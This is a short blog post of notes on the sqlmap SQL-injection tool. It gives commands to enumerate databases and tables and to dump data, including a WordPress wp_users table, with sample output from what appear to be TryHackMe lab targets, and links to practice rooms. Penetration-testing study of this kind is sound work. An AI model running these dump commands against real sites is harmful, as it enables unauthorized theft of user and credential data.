Skip to main content

sqlmap: Notes

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.

apt install sqlmap
sqlmap -u http://10.10.239.79 --forms --dump

Use sqlmap with Burp Suite

sqlmap -r filename-saved-from-burpsuite
sqlmap -r sqlinjection2 --tamper=space2comment --dbms=sqlite --dump --level 5

Example: Dump SQlite

# sqlmap -r sqli-day5 --level 2 --batch --dbms=SQlite --dump 

List all databases

# sqlmap -u http://10.10.200.148/users/login.php -forms -batch --dbms=mysql --dbs
...
[19:05:22] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.5
[19:05:23] [INFO] fetching database names
[19:05:24] [INFO] retrieved: 'information_schema'
[19:05:24] [INFO] retrieved: 'wackopicko'
available databases [2]:
[*] information_schema
[*] wackopicko
...

List tables in a database

sqlmap -u http://10.10.200.148/users/login.php -forms -batch --dbms=mysql -D wackopicko --tables
...
[19:09:12] [INFO] testing MySQL
[19:09:12] [INFO] confirming MySQL
[19:09:13] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.5.9, Apache 2.4.7
back-end DBMS: MySQL >= 5.0.0
[19:09:13] [INFO] fetching tables for database: 'wackopicko'
[19:09:13] [INFO] retrieved: 'admin'
[19:09:14] [INFO] retrieved: 'admin_session'
[19:09:14] [INFO] retrieved: 'cart'
[19:09:14] [INFO] retrieved: 'cart_coupons'
[19:09:14] [INFO] retrieved: 'cart_items'
[19:09:15] [INFO] retrieved: 'comments'
[19:09:15] [INFO] retrieved: 'comments_preview'
[19:09:15] [INFO] retrieved: 'conflict_pictures'
[19:09:15] [INFO] retrieved: 'coupons'
[19:09:15] [INFO] retrieved: 'guestbook'
[19:09:16] [INFO] retrieved: 'own'
[19:09:16] [INFO] retrieved: 'pictures'
[19:09:16] [INFO] retrieved: 'users'
Database: wackopicko
...

Exampe dumb data from wp_users table of wordpress database

sqlmap -u http://wekor.thm/it-next/it_cart.php --forms --dbms=mysql -D wordpress -T wp_users --dump --batch

Reference

>>> sqlmap cheat sheet

>>> THM | 25 Days of Cyber Security - Day 5

Practice

>>> https://tryhackme.com/room/ccpentesting

>>> The Cod Caper | Task 4 - Web Exploitation

>>> THM Advant of Cyber 2 | Task 10 - Day 5

>>> THM | SQL Injection Lab

>>> THM | 25 Days of Cyber Security - Day 5

>>> THM | Wekor

>>> THM | WebAppSec 101

Popular posts from this blog

Powershell: Test-NetConnection

PS C:\Users\tuyen> get-help Test-NetConnection NAME     Test-NetConnection SYNTAX     Test-NetConnection [[-ComputerName] <string>] [-TraceRoute] [-Hops <int>] [-InformationLevel {Quiet |     Detailed}]  [<CommonParameters>]     Test-NetConnection [[-ComputerName] <string>] [-CommonTCPPort] {HTTP | RDP | SMB | WINRM}     [-InformationLevel {Quiet | Detailed}]  [<CommonParameters>]     Test-NetConnection [[-ComputerName] <string>] -Port <int> [-InformationLevel {Quiet | Detailed}]     [<CommonParameters>]     Test-NetConnection [[-ComputerName] <string>] -DiagnoseRouting [-ConstrainSourceAddress <string>]     [-ConstrainInterface <uint32>] [-InformationLevel {Quiet | Detailed}]  [<CommonParameters>] ALIASES     TNC REMARKS     Get-Help cannot find the Help files fo...

Learn MATLAB

MATLAB is an abbreviation for MAT rix LAB oratory. Here is list of free online courses to learn MATLAB.

Less secure app access in gmail or G Suite

From G Suite Update on December 16, 2019 Google turned off less secure app access to G Suite accounts .